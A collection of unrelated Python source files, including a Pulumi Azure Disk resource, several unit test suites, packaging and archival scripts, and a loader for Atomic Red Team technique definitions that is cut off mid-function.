# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Disk']
class Disk(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_type: Optional[pulumi.Input['StorageAccountTypes']] = None,
creation_data: Optional[pulumi.Input[pulumi.InputType['CreationDataArgs']]] = None,
disk_name: Optional[pulumi.Input[str]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input[pulumi.InputType['EncryptionSettingsArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
os_type: Optional[pulumi.Input['OperatingSystemTypes']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Disk resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input['StorageAccountTypes'] account_type: the storage account type of the disk.
:param pulumi.Input[pulumi.InputType['CreationDataArgs']] creation_data: Disk source information. CreationData information cannot be changed after the disk has been created.
:param pulumi.Input[str] disk_name: The name of the managed disk that is being created. The name can't be changed after the disk is created. Supported characters for the name are a-z, A-Z, 0-9 and _. The maximum name length is 80 characters.
:param pulumi.Input[int] disk_size_gb: If creationData.createOption is Empty, this field is mandatory and it indicates the size of the VHD to create. If this field is present for updates or creation with other options, it indicates a resize. Resizes are only allowed if the disk is not attached to a running VM, and can only increase the disk's size.
:param pulumi.Input[pulumi.InputType['EncryptionSettingsArgs']] encryption_settings: Encryption settings for disk or snapshot
:param pulumi.Input[str] location: Resource location
:param pulumi.Input['OperatingSystemTypes'] os_type: The Operating System type.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['account_type'] = account_type
if creation_data is None and not opts.urn:
raise TypeError("Missing required property 'creation_data'")
__props__['creation_data'] = creation_data
__props__['disk_name'] = disk_name
__props__['disk_size_gb'] = disk_size_gb
__props__['encryption_settings'] = encryption_settings
__props__['location'] = location
__props__['os_type'] = os_type
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['name'] = None
__props__['owner_id'] = None
__props__['provisioning_state'] = None
__props__['time_created'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/v20160430preview:Disk"), pulumi.Alias(type_="azure-native:compute:Disk"), pulumi.Alias(type_="azure-nextgen:compute:Disk"), pulumi.Alias(type_="azure-native:compute/latest:Disk"), pulumi.Alias(type_="azure-nextgen:compute/latest:Disk"), pulumi.Alias(type_="azure-native:compute/v20170330:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20170330:Disk"), pulumi.Alias(type_="azure-native:compute/v20180401:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180401:Disk"), pulumi.Alias(type_="azure-native:compute/v20180601:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180601:Disk"), pulumi.Alias(type_="azure-native:compute/v20180930:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180930:Disk"), pulumi.Alias(type_="azure-native:compute/v20190301:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:Disk"), pulumi.Alias(type_="azure-native:compute/v20190701:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:Disk"), pulumi.Alias(type_="azure-native:compute/v20191101:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20191101:Disk"), pulumi.Alias(type_="azure-native:compute/v20200501:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200501:Disk"), pulumi.Alias(type_="azure-native:compute/v20200630:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200630:Disk"), pulumi.Alias(type_="azure-native:compute/v20200930:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:Disk")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Disk, __self__).__init__(
'azure-native:compute/v20160430preview:Disk',
resource_name,
__props__,
opts)
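    # Illustrative sketch (not generated code): a minimal disk creation, assuming
    # an existing resource group named "example-rg". CreationDataArgs comes from
    # ._inputs above; the Empty create option mirrors the docstring's
    # creationData.createOption description.
    #   disk = Disk("example-disk",
    #               resource_group_name="example-rg",
    #               location="westus",
    #               disk_size_gb=64,
    #               creation_data=CreationDataArgs(create_option="Empty"))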
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Disk':
"""
Get an existing Disk resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["account_type"] = None
__props__["creation_data"] = None
__props__["disk_size_gb"] = None
__props__["encryption_settings"] = None
__props__["location"] = None
__props__["name"] = None
__props__["os_type"] = None
__props__["owner_id"] = None
__props__["provisioning_state"] = None
__props__["tags"] = None
__props__["time_created"] = None
__props__["type"] = None
return Disk(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountType")
def account_type(self) -> pulumi.Output[Optional[str]]:
"""
the storage account type of the disk.
"""
return pulumi.get(self, "account_type")
@property
@pulumi.getter(name="creationData")
def creation_data(self) -> pulumi.Output['outputs.CreationDataResponse']:
"""
Disk source information. CreationData information cannot be changed after the disk has been created.
"""
return pulumi.get(self, "creation_data")
@property
@pulumi.getter(name="diskSizeGB")
def disk_size_gb(self) -> pulumi.Output[Optional[int]]:
"""
If creationData.createOption is Empty, this field is mandatory and it indicates the size of the VHD to create. If this field is present for updates or creation with other options, it indicates a resize. Resizes are only allowed if the disk is not attached to a running VM, and can only increase the disk's size.
"""
return pulumi.get(self, "disk_size_gb")
@property
@pulumi.getter(name="encryptionSettings")
def encryption_settings(self) -> pulumi.Output[Optional['outputs.EncryptionSettingsResponse']]:
"""
Encryption settings for disk or snapshot
"""
return pulumi.get(self, "encryption_settings")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="osType")
def os_type(self) -> pulumi.Output[Optional[str]]:
"""
The Operating System type.
"""
return pulumi.get(self, "os_type")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
A relative URI containing the VM id that has the disk attached.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The disk provisioning state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The time when the disk was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
py | 7dfcfdaa15a0cfc55ba332be6607f08a05e1702e | import argparse
import simpleamt
if __name__ == "__main__":
parser = argparse.ArgumentParser(
        parents=[simpleamt.get_parent_parser()], description="Block workers"
)
parser.add_argument("--worker_ids_file")
args = parser.parse_args()
mtc = simpleamt.get_mturk_connection_from_args(args)
worker_ids = []
with open(args.worker_ids_file, "r") as f:
worker_ids = [line.strip() for line in f]
print(
"This will block %d workers with IDs with sandbox=%s"
% (len(worker_ids), str(args.sandbox))
)
print("Continue?")
s = input("(y/N): ")
if s.strip().lower() == "y":
for worker_id in worker_ids:
try:
mtc.create_worker_block(
                    WorkerId=worker_id, Reason="provided bad data"
)
except Exception as e:
print("Failed to block: %s" % (worker_id))
print(e)
else:
print("Aborting")
|
py | 7dfcfde723fbb6d636d1916564e9e2bf4a1a56dc | #!/usr/bin/env python
# Copyright 2020 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import pytest
import torch as th
from aps.libs import aps_sse_nnet
from aps.transform import EnhTransform
num_bins = 257
log_cmvn_transform = EnhTransform(feats="spectrogram-log-cmvn",
frame_len=512,
frame_hop=256,
center=True)
with_ipd_transform = EnhTransform(feats="spectrogram-log-cmvn-ipd",
frame_len=512,
frame_hop=256,
center=True,
ipd_index="0,1;0,2;0,3")
none_transform = EnhTransform(feats="",
frame_len=512,
frame_hop=256,
center=True)
@pytest.mark.parametrize("num_spks,non_linear", [
pytest.param(1, "sigmoid"),
pytest.param(2, "softmax"),
pytest.param(3, "relu")
])
def test_base_rnn(num_spks, non_linear):
nnet_cls = aps_sse_nnet("sse@base_rnn")
base_rnn = nnet_cls(enh_transform=log_cmvn_transform,
num_bins=num_bins,
input_size=num_bins,
input_proj=512,
num_layers=2,
hidden=512,
num_spks=num_spks,
mask_non_linear=non_linear)
inp = th.rand(2, 64000)
x = base_rnn(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([2, num_bins, 251])
z = base_rnn.infer(inp[0])
if num_spks > 1:
z = z[0]
assert z.shape == th.Size([64000])
@pytest.mark.parametrize("non_linear", ["softmax", "relu"])
def test_chimera(non_linear):
nnet_cls = aps_sse_nnet("sse@chimera++")
chimera = nnet_cls(enh_transform=log_cmvn_transform,
num_bins=num_bins,
input_size=num_bins,
num_layers=2,
hidden=512,
num_spks=2,
mask_non_linear=non_linear)
inp = th.rand(2, 64000)
x = chimera(inp)
assert x[0].shape == th.Size([2, num_bins, 251])
z = chimera.infer(inp[0])
assert z[0].shape == th.Size([64000])
def test_phasen():
nnet_cls = aps_sse_nnet("sse@phasen")
phasen = nnet_cls(12,
4,
enh_transform=none_transform,
num_tsbs=1,
num_bins=num_bins,
channel_r=5,
conv1d_kernel=9,
lstm_hidden=256,
linear_size=512)
inp = th.rand(4, 64000)
x = phasen(inp)
assert x.shape == th.Size([4, num_bins, 251, 2])
z = phasen.infer(inp[1])
assert z.shape == th.Size([64000])
@pytest.mark.parametrize("num_branch", [1, 2])
@pytest.mark.parametrize("cplx", [True, False])
def test_dcunet(num_branch, cplx):
nnet_cls = aps_sse_nnet("sse@dcunet")
dcunet = nnet_cls(enh_transform=none_transform,
K="7,5;7,5;5,3;5,3;3,3;3,3",
S="2,1;2,1;2,1;2,1;2,1;2,1",
C="32,32,64,64,64,128",
P="1,1,1,1,1,0",
O="0,0,1,1,1,0",
num_branch=num_branch,
cplx=cplx,
non_linear="tanh" if cplx else "sigmoid",
causal_conv=False,
connection="cat")
inp = th.rand(4, 64000)
x = dcunet(inp)
if num_branch > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dcunet.infer(inp[1])
if num_branch > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks", [1, 2])
@pytest.mark.parametrize("non_linear", ["", "sigmoid"])
def test_dense_unet(num_spks, non_linear):
nnet_cls = aps_sse_nnet("sse@dense_unet")
dense_unet = nnet_cls(K="3,3;3,3;3,3;3,3;3,3;3,3;3,3;3,3",
S="1,1;2,1;2,1;2,1;2,1;2,1;2,1;2,1",
P="0,1;0,1;0,1;0,1;0,1;0,1;0,1;0,1;0,1",
O="0,0,0,0,0,0,0,0",
enc_channel="16,32,32,32,32,64,128,384",
dec_channel="32,16,32,32,32,32,64,128",
conv_dropout=0.3,
num_spks=num_spks,
rnn_hidden=512,
rnn_layers=2,
rnn_resize=384,
rnn_bidir=False,
rnn_dropout=0.2,
num_dense_blocks=3,
enh_transform=log_cmvn_transform,
non_linear=non_linear,
inp_cplx=True,
out_cplx=True,
training_mode="time")
inp = th.rand(4, 64000)
x = dense_unet(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dense_unet.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks", [1, 2])
def test_freq_xfmr(num_spks):
nnet_cls = aps_sse_nnet("sse@freq_xfmr")
pose_kwargs = {"lradius": 256, "rradius": 256, "dropout": 0.1}
arch_kwargs = {
"att_dropout": 0.1,
"feedforward_dim": 512,
"pre_norm": False,
"att_dim": 256,
"nhead": 4
}
xfmr = nnet_cls(arch="xfmr",
input_size=num_bins,
enh_transform=log_cmvn_transform,
num_spks=num_spks,
num_bins=num_bins,
arch_kwargs=arch_kwargs,
pose_kwargs=pose_kwargs,
num_layers=3,
non_linear="sigmoid",
training_mode="time")
inp = th.rand(4, 64000)
x = xfmr(inp)
if num_spks > 1:
assert len(x) == num_spks
assert x[0].shape == th.Size([4, 64000])
else:
assert x.shape == th.Size([4, 64000])
y = xfmr.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks,nonlinear", [
pytest.param(1, "sigmoid"),
pytest.param(2, "softmax"),
pytest.param(2, "relu")
])
def test_tasnet(num_spks, nonlinear):
nnet_cls = aps_sse_nnet("sse@time_tcn")
tasnet = nnet_cls(L=40,
N=256,
X=6,
R=2,
B=256,
H=512,
P=3,
norm="cLN",
num_spks=num_spks,
non_linear=nonlinear,
skip_residual=True,
causal=False,
mixture_consistency="none")
inp = th.rand(4, 64000)
x = tasnet(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = tasnet.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
@pytest.mark.parametrize("num_spks", [1, 2])
@pytest.mark.parametrize("cplx", [True, False])
def test_dccrn(num_spks, cplx):
nnet_cls = aps_sse_nnet("sse@dccrn")
dccrn = nnet_cls(enh_transform=log_cmvn_transform,
cplx=cplx,
K="3,3;3,3;3,3;3,3;3,3;3,3;3,3",
S="2,1;2,1;2,1;2,1;2,1;2,1;2,1",
P="1,1,1,1,1,0,0",
O="0,0,0,0,0,0,1",
C="16,32,64,64,128,128,256",
num_spks=num_spks,
rnn_resize=512 if cplx else 256,
non_linear="sigmoid",
connection="cat")
inp = th.rand(4, 64000)
x = dccrn(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dccrn.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
def test_rnn_enh_ml():
nnet_cls = aps_sse_nnet("sse@rnn_enh_ml")
rnn_enh_ml = nnet_cls(enh_transform=with_ipd_transform,
num_bins=num_bins,
input_size=num_bins * 4,
input_proj=512,
num_layers=2,
hidden=512)
inp = th.rand(2, 5, 64000)
x, y = rnn_enh_ml(inp)
assert x.shape == th.Size([2, 5, num_bins, 251])
assert th.isnan(x.real).sum() + th.isnan(x.imag).sum() == 0
assert y.shape == th.Size([2, 251, num_bins])
z = rnn_enh_ml.infer(inp[0])
assert z.shape == th.Size([251, num_bins])
@pytest.mark.parametrize("resampling_factor", [1, 2, 4])
@pytest.mark.parametrize("chunk_len", [16000, 32000])
def test_demucs(resampling_factor, chunk_len):
nnet_cls = aps_sse_nnet("sse@demucs")
from aps.sse.enh.demucs import workout_train_chunk_length
chunk_len_for_train = workout_train_chunk_length(
chunk_len, resampling_factor=resampling_factor)
demucs = nnet_cls(resampling_factor=resampling_factor)
x = th.rand(2, chunk_len_for_train)
y = demucs(x)
assert y.shape == th.Size([2, chunk_len_for_train])
x = th.rand(chunk_len)
y = demucs.infer(x)
assert y.shape == th.Size([chunk_len])
@pytest.mark.parametrize("num_spks", [1, 2])
def test_dfsmn(num_spks):
nnet_cls = aps_sse_nnet("sse@dfsmn")
dfsmn = nnet_cls(enh_transform=log_cmvn_transform,
num_layers=3,
dim=512,
num_branchs=num_spks,
project=256,
lctx=11,
rctx=5,
training_mode="time")
inp = th.rand(4, 64000)
x = dfsmn(inp)
if num_spks > 1:
x = x[0]
assert x.shape == th.Size([4, 64000])
y = dfsmn.infer(inp[1])
if num_spks > 1:
y = y[0]
assert y.shape == th.Size([64000])
def test_dprnn():
nnet_cls = aps_sse_nnet("sse@time_dprnn")
dprnn = nnet_cls(num_spks=1,
kernel=16,
num_bins=64,
chunk_size=100,
num_layers=2,
rnn_hidden=64,
bidirectional=True,
non_linear="relu")
inp = th.rand(4, 64000)
x = dprnn(inp)
assert x.shape == th.Size([4, 64000])
y = dprnn.infer(inp[1])
assert y.shape == th.Size([64000])
def test_sepformer():
nnet_cls = aps_sse_nnet("sse@freq_sepformer")
arch_kwargs = {
"att_dim": 256,
"nhead": 4,
"feedforward_dim": 1024,
"pre_norm": True,
"att_dropout": 0.1,
"ffn_dropout": 0.1,
"activation": "relu"
}
sepformer = nnet_cls("xfmr",
enh_transform=log_cmvn_transform,
num_bins=num_bins,
num_spks=1,
num_blocks=2,
num_layers=2,
chunk_size=16,
arch_kwargs=arch_kwargs,
training_mode="time")
mix = th.rand(2, 32000)
bss = sepformer(mix)
assert bss.shape == th.Size([2, 32000])
bss = sepformer.infer(mix[1])
assert bss.shape == th.Size([32000])
|
py | 7dfcffc357177139a3cbddcf4799e66c23ce698e | # 043 - Write a Python program to get OS name, platform and release information.
from platform import release, system
from os import name
print(f'Name: {name}\nPlatform: {system()}\nRelease: {release()}') |
py | 7dfcffefa580f7c02e9ce710f581b4a713b08092 | from enum import Enum
import pytest
from bson import InvalidDocument
from mongoengine import Document, EnumField, ValidationError
from tests.utils import MongoDBTestCase, get_as_pymongo
class Status(Enum):
NEW = "new"
DONE = "done"
class ModelWithEnum(Document):
status = EnumField(Status)
class TestStringEnumField(MongoDBTestCase):
def test_storage(self):
model = ModelWithEnum(status=Status.NEW).save()
assert get_as_pymongo(model) == {"_id": model.id, "status": "new"}
def test_set_enum(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status=Status.NEW).save()
assert ModelWithEnum.objects(status=Status.NEW).count() == 1
assert ModelWithEnum.objects.first().status == Status.NEW
def test_set_by_value(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status="new").save()
assert ModelWithEnum.objects.first().status == Status.NEW
def test_filter(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status="new").save()
assert ModelWithEnum.objects(status="new").count() == 1
assert ModelWithEnum.objects(status=Status.NEW).count() == 1
assert ModelWithEnum.objects(status=Status.DONE).count() == 0
def test_change_value(self):
m = ModelWithEnum(status="new")
m.status = Status.DONE
m.save()
assert m.status == Status.DONE
m.status = "wrong"
assert m.status == "wrong"
with pytest.raises(ValidationError):
m.validate()
def test_set_default(self):
class ModelWithDefault(Document):
status = EnumField(Status, default=Status.DONE)
m = ModelWithDefault().save()
assert m.status == Status.DONE
def test_enum_field_can_be_empty(self):
ModelWithEnum.drop_collection()
m = ModelWithEnum().save()
assert m.status is None
assert ModelWithEnum.objects()[0].status is None
assert ModelWithEnum.objects(status=None).count() == 1
def test_set_none_explicitly(self):
ModelWithEnum.drop_collection()
ModelWithEnum(status=None).save()
assert ModelWithEnum.objects.first().status is None
def test_cannot_create_model_with_wrong_enum_value(self):
m = ModelWithEnum(status="wrong_one")
with pytest.raises(ValidationError):
m.validate()
def test_user_is_informed_when_tries_to_set_choices(self):
with pytest.raises(ValueError, match="'choices' can't be set on EnumField"):
EnumField(Status, choices=["my", "custom", "options"])
class Color(Enum):
RED = 1
BLUE = 2
class ModelWithColor(Document):
color = EnumField(Color, default=Color.RED)
class TestIntEnumField(MongoDBTestCase):
def test_enum_with_int(self):
ModelWithColor.drop_collection()
m = ModelWithColor().save()
assert m.color == Color.RED
assert ModelWithColor.objects(color=Color.RED).count() == 1
assert ModelWithColor.objects(color=1).count() == 1
assert ModelWithColor.objects(color=2).count() == 0
def test_create_int_enum_by_value(self):
model = ModelWithColor(color=2).save()
assert model.color == Color.BLUE
def test_storage_enum_with_int(self):
model = ModelWithColor(color=Color.BLUE).save()
assert get_as_pymongo(model) == {"_id": model.id, "color": 2}
def test_validate_model(self):
with pytest.raises(ValidationError, match="Value must be one of"):
ModelWithColor(color=3).validate()
with pytest.raises(ValidationError, match="Value must be one of"):
ModelWithColor(color="wrong_type").validate()
class TestFunkyEnumField(MongoDBTestCase):
def test_enum_incompatible_bson_type_fails_during_save(self):
class FunkyColor(Enum):
YELLOW = object()
class ModelWithFunkyColor(Document):
color = EnumField(FunkyColor)
m = ModelWithFunkyColor(color=FunkyColor.YELLOW)
with pytest.raises(InvalidDocument, match="[cC]annot encode object"):
m.save()
|
py | 7dfd029798ead2ca7b72aa0fd7e7872a5e275338 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# read version string
with open(path.join(here, "video_fft", "__init__.py")) as version_file:
version = eval(version_file.read().split(" = ")[1].strip())
# Get the long description from the README file
with open(path.join(here, "README.md"), encoding="utf-8") as f:
long_description = f.read()
# Get the history from the CHANGELOG file
with open(path.join(here, "CHANGELOG.md"), encoding="utf-8") as f:
history = f.read()
setup(
name="video_fft",
version=version,
description="Calculate the magnitude spectrum of a video sequence, via Fast Fourier Transform",
long_description=long_description + "\n\n" + history,
long_description_content_type="text/markdown",
author="Werner Robitza",
author_email="[email protected]",
url="https://github.com/slhck/video-fft",
packages=["video_fft"],
include_package_data=True,
install_requires=[
"av>=8.0.3",
"tqdm>=4.60.0",
"numpy>=1.20.2",
"matplotlib>=3.4.2",
],
license="MIT",
zip_safe=False,
keywords="ffmpeg, video",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Multimedia :: Video",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
python_requires=">=3.6",
entry_points={"console_scripts": ["video-fft = video_fft.__main__:main"]},
)
|
py | 7dfd029b4918d4dbc03e1e04254750f965a220d8 | #!/usr/bin/env python
import configparser
from asnake.aspace import ASpace
config = configparser.ConfigParser()
config.read("local_settings.cfg")
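# local_settings.cfg is expected to provide an [ArchivesSpace] section with the
# baseURL, user and password keys read below; the values shown are placeholders:
#   [ArchivesSpace]
#   baseURL = http://localhost:8089
#   user = admin
#   password = change-me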
aspace = ASpace(
baseurl=config.get("ArchivesSpace", "baseURL"),
username=config.get("ArchivesSpace", "user"),
password=config.get("ArchivesSpace", "password"),
)
repo = aspace.repositories(2)
output_file = "output_filename.tsv"
resource_id = 12345
def is_year(date, x, y):
'''
date (str): string to check for a 4 digit year
x (int): starting index value
y (int): ending index value
'''
if date[x:y].isdigit() and int(
date[x:y]) >= 1800 and int(date[x:y]) <= 2010:
return True
else:
return False
def find_year(date):
'''takes a string, and finds a 4 digit string matching years likely in our
collections, working backwards from end of string; checks last four
characters before looping'''
if len(date) >= 4:
if is_year(date, -4, None):
return date[-4:]
else:
x = -5
y = -1
for r in range(len(date)):
if is_year(date, x, y):
return date[x:y]
else:
x += -1
y += -1
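# For example (illustrative): find_year("May 1945") returns "1945", while
# find_year("n.d.") returns None because no 4-digit year in 1800-2010 is found.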
def get_end_date(ao, default_date):
# uses either structured date or date expression to get end year
if ao.get("dates"):
# check for structured date field, return date as YYYY-YYYY
if ao.get("dates")[0].get("begin"):
return find_year(
ao.get("dates")[0].get(
"end", ao.get("dates")[0].get(
"begin", "")))
else:
if len(ao.get("dates")[0].get("expression")) == 4:
return ao.get("dates")[0].get("expression")
else:
return find_year(ao.get("dates")[0].get("expression"))
else:
return default_date
# create empty list to append uris to
list_of_uris = []
for record in repo.resources(resource_id).tree.walk:
# traverse tree of resource record, use level to skip series
if record.level == "file":
list_of_uris.append(record.uri)
f = open(output_file, "a")
for uri in list_of_uris:
obj = aspace.client.get(uri, params={"resolve": ["top_container"]})
item_json = obj.json()
if item_json.get("instances"):
for i in item_json.get("instances"):
if i.get("instance_type") != "digital_object":
subcontainer = i.get('sub_container')
if subcontainer.get("type_2") == "folder":
folder_number = "{} {}".format(subcontainer.get(
'type_2'), subcontainer.get('indicator_2'))
top_container = subcontainer.get(
"top_container").get("_resolved")
if top_container.get("type") == "box":
f.write(
"{}\t{} {}, {}\t{}\t{}\n".format(
item_json.get("title"),
top_container.get("type").capitalize(),
top_container.get("indicator"),
folder_number,
get_end_date(item_json, "1940"),
item_json.get("ref_id")))
f.close()
|
py | 7dfd04404796e1fd5ae7584c63884183e8de6679 | #!/usr/bin/env python
"""Unit tests for M2Crypto.EC, ECDSA part.
Copyright (c) 2000 Ng Pheng Siong. All rights reserved.
Portions copyright (c) 2005-2006 Vrije Universiteit Amsterdam. All
rights reserved.
"""
import hashlib
import logging
from M2Crypto import EC, Rand
from . import unittest
from tests.test_ec_curves import tested_curve
log = logging.getLogger(__name__)
class ECDSATestCase(unittest.TestCase):
errkey = 'tests/rsa.priv.pem'
privkey = 'tests/ec.priv.pem'
pubkey = 'tests/ec.pub.pem'
data = hashlib.sha1(b'Can you spell subliminal channel?').digest()
def callback(self, *args):
pass
def callback2(self):
pass
def test_loadkey_junk(self):
with self.assertRaises(ValueError):
EC.load_key(self.errkey)
def test_loadkey(self):
ec = EC.load_key(self.privkey)
self.assertEqual(len(ec), tested_curve[1])
def test_loadpubkey(self):
# XXX more work needed
ec = EC.load_pub_key(self.pubkey)
self.assertEqual(len(ec), tested_curve[1])
with self.assertRaises(EC.ECError):
EC.load_pub_key(self.errkey)
def _test_sign_dsa(self):
ec = EC.gen_params(tested_curve[0])
# ec.gen_key()
with self.assertRaises(EC.ECError):
ec.sign_dsa(self.data)
ec = EC.load_key(self.privkey)
r, s = ec.sign_dsa(self.data)
assert ec.verify_dsa(self.data, r, s)
assert not ec.verify_dsa(self.data, s, r)
def test_sign_dsa_asn1(self):
ec = EC.load_key(self.privkey)
blob = ec.sign_dsa_asn1(self.data)
assert ec.verify_dsa_asn1(self.data, blob)
with self.assertRaises(EC.ECError):
ec.verify_dsa_asn1(blob, self.data)
def test_verify_dsa(self):
ec = EC.load_key(self.privkey)
r, s = ec.sign_dsa(self.data)
ec2 = EC.load_pub_key(self.pubkey)
assert ec2.verify_dsa(self.data, r, s)
assert not ec2.verify_dsa(self.data, s, r)
def test_genparam(self):
ec = EC.gen_params(tested_curve[0])
self.assertEqual(len(ec), tested_curve[1])
def test_pub_key_from_params(self):
curve = EC.NID_prime256v1
ec = EC.gen_params(curve)
ec.gen_key()
ec_pub = ec.pub()
k = ec_pub.get_key()
ec2 = EC.pub_key_from_params(curve, k)
assert ec2.check_key()
r, s = ec.sign_dsa(self.data)
assert ec2.verify_dsa(self.data, r, s)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(ECDSATestCase)
if __name__ == '__main__':
Rand.load_file('randpool.dat', -1)
unittest.TextTestRunner().run(suite())
Rand.save_file('randpool.dat')
|
py | 7dfd04420e46026d3e837bedc87a3c6cebec92b2 | import os
from pathlib import Path, PurePath
import yaml
from ..base import Base
from .atomic import Atomic
from ..utils.exceptions import AtomicsFolderNotFound
class Loader(Base):
__techniques = {}
TECHNIQUE_DIRECTORY_PATTERN = 'T*'
def __get_file_name(self, path) -> str:
        # use the path stem so only the '.yaml' suffix is removed (str.rstrip
        # would strip any trailing '.', 'y', 'a', 'm', 'l' characters individually)
        return Path(path).stem
def find_atomics(self, atomics_path, pattern='**/T*/T*.yaml') -> list:
"""Attempts to find the atomics folder within the provided atomics_path
Args:
atomics_path (str): A path to the atomic-red-team directory
pattern (str, optional): Pattern used to find atomics and their required yaml files. Defaults to '**/T*/T*.yaml'.
Returns:
list: A list of paths of all identified atomics found in the given directory
"""
result = []
path = PurePath(atomics_path)
for p in Path(path).rglob(pattern):
result.append(p.resolve())
return result
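    # Example (illustrative paths): Loader().find_atomics('/opt/atomic-red-team/atomics')
    # returns resolved Path objects such as .../atomics/T1003/T1003.yaml that match
    # the default '**/T*/T*.yaml' pattern.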
def load_technique(self, path_to_dir) -> dict:
"""Loads a provided yaml file which is typically an Atomic defintiion or configuration file.
Args:
path_to_dir (str): A string path to a yaml formatted file
Returns:
dict: Returns the loaded yaml file in a dictionary format
"""
try:
with open(self.get_abs_path(path_to_dir), 'r', encoding="utf-8") as f:
return yaml.safe_load(f.read())
except:
# windows does not like get_abs_path so casting to string
with open(str(path_to_dir), 'r', encoding="utf-8") as f:
return yaml.safe_load(f.read())
def load_techniques(self) -> dict:
"""The main entrypoint when loading techniques from disk.
Raises:
AtomicsFolderNotFound: Thrown when unable to find the folder containing
Atomic tests
Returns:
            dict: A dict keyed by Atomic technique ID whose values are the
                  corresponding Atomic objects.
"""
atomics_path = Base.CONFIG.atomics_path
if not os.path.exists(self.get_abs_path(atomics_path)):
atomics_path = self.find_atomics(self.get_abs_path(__file__))
if not atomics_path:
